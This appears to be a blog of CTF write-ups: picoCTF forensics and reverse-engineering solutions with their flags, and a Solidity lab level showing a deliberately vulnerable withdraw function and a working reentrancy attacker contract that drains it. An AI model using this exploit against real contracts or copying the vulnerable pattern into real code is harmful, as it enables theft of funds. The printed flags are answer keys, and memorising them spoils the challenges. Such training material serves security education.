26 Sep 2022
PicoCTF 2021 / Forensics / sleuthkit
Description
Description
Download the disk image and use mmls
on it to find the size of the Linux partition. Connect to the remote checker service to check your answer and get the flag.
Note: if you are using the webshell, download and extract the disk image into /tmp
not your home directory.
Prereguisite
mmls, which is a tool of sleuthkit used to display the partition layout of a volume system (partition tables).
Writeup
- Download the file.
wget https://artifacts.picoctf.net/c/114/disk.img.gz
- Unzip.
- Display the partition layout of a volume system (partition tables).
nc saturn.picoctf.net 52279
and input 202752
.
- Here’s flag !
picoCTF{mm15_f7w!}
٩(^ᴗ^)۶
26 Sep 2022
PicoCTF 2022 / Reverse Engineering
Description
Can you open this safe?
I forgot the key to my safe but this program is supposed to help me with retrieving the lost key. Can you help me unlock my safe?
Put the password you recover into the picoCTF flag format like:
picoCTF{password}
Writeup
- Download the progrem
SafeOpener.java
. There is a method named openSafe
used to check if password correct. String encodedkey
is password which was transferd to byte array and encode.
- We can derive the password by decoding string
encodedkey
. Add four lines to openSafe
method.

- Execute the program. Here’s flag!
picoCTF{pl3as3_l3t_m3_1nt0_th3_saf3}
٩(^ᴗ^)۶
26 Sep 2022
PicoCTF 2022 / Forensics
Description
Now you DON’T see me.
This report has some critical data in it, some of which have been redacted correctly, while some were not. Can you find an important key that was not redacted properly?
Prereguisite
pdftotext
You can download by sudo apt install poppler-utils
.
Writeup
- Download the pdf.
wget https://artifacts.picoctf.net/c/264/Financial_Report_for_ABC_Labs.pdf
- Convert pdf to txt.
pdftotext Financial_Report_for_ABC_Labs.pdf
- Grep the flag.
cat Financial_Report_for_ABC_Labs.txt| grep pico
- Here’s flag!
picoCTF{C4n_Y0u_S33_m3_fully}
٩(^ᴗ^)۶
25 Sep 2022
PicoCTF 2021 / Forensics
Description
Matryoshka dolls are a set of wooden dolls of decreasing size placed one inside another. What’s the final one?
Image: this
Prereguisite
Binwalk, which is a tool for searching a given binary image for embedded files and executable code.
Writeup
- Download the file.
wget https://mercury.picoctf.net/static/205adad23bf9d8303081a0e71c9beab8/dolls.jpg
- Unzip the file
- Use
ls
command, we can see that there are one file(dolls.jpg
) and one folder(_dolls.jpg.extracted
). Second picture(2_c.jpg
) is in _dolls.jpg.extracted/base_images
.
- Repeat unzip like step 2 three times.
cd _dolls.jpg.extracted/base_images
binwalk -e 2_c.jpg
cd _2_c.jpg.extracted/base_images
binwalk -e 3_c.jpg
cd _3_c.jpg.extracted/base_images
binwalk -e 4_c.jpg
cd _4_c.jpg.extracted
- Now If we use
ls
command to list all file under the folder, there is a file named flag.txt
!
- Here’s our flag. ٩(^ᴗ^)۶
cat flag.txt
# picoCTF{96fac089316e094d41ea046900197662}
24 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
The goal of this level is for you to steal all the funds from the contract.
Things that might help:
- Untrusted contracts can execute code where you least expect it.
- Fallback methods
- Throw/revert bubbling
- Sometimes the best way to attack a contract is with another contract.
- See the Help page above, section “Beyond the console”
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import '@openzeppelin/contracts/math/SafeMath.sol';
contract Reentrance {
using SafeMath for uint256;
mapping(address => uint) public balances;
function donate(address _to) public payable {
balances[_to] = balances[_to].add(msg.value);
}
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
(bool result,) = msg.sender.call{value:_amount}("");
if(result) {
_amount;
}
balances[msg.sender] -= _amount;
}
}
receive() external payable {}
}
Writeup
- Get new instance.
- Get contract’s balance.
await getBalance(contract.address)
// 0.001
- Create a contract.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface IReentrance {
function donate(address _to) external payable;
function withdraw(uint256 _amount) external;
}
contract ReentrancyAttacker {
IReentrance levelInstance;
uint targetValue = 0.001 ether;
constructor(address _levelInstance) {
levelInstance = IReentrance(_levelInstance);
}
function attack() public {
levelInstance.withdraw(targetValue);
}
fallback() external payable {
levelInstance.withdraw(targetValue);
}
}
- Compile and deploy with
Reentrance
instance address.
- Donate 0.001 ether to our
ReentrancyAttacker
contract.
await contract.donate('REENTRANCYATTACKER_CONTRACT_ADDRESS', {value: 0.001 })
- Call
attack
function in the ReentrancyAttacker
.
- Submit instance ξ( ✿>◡❛)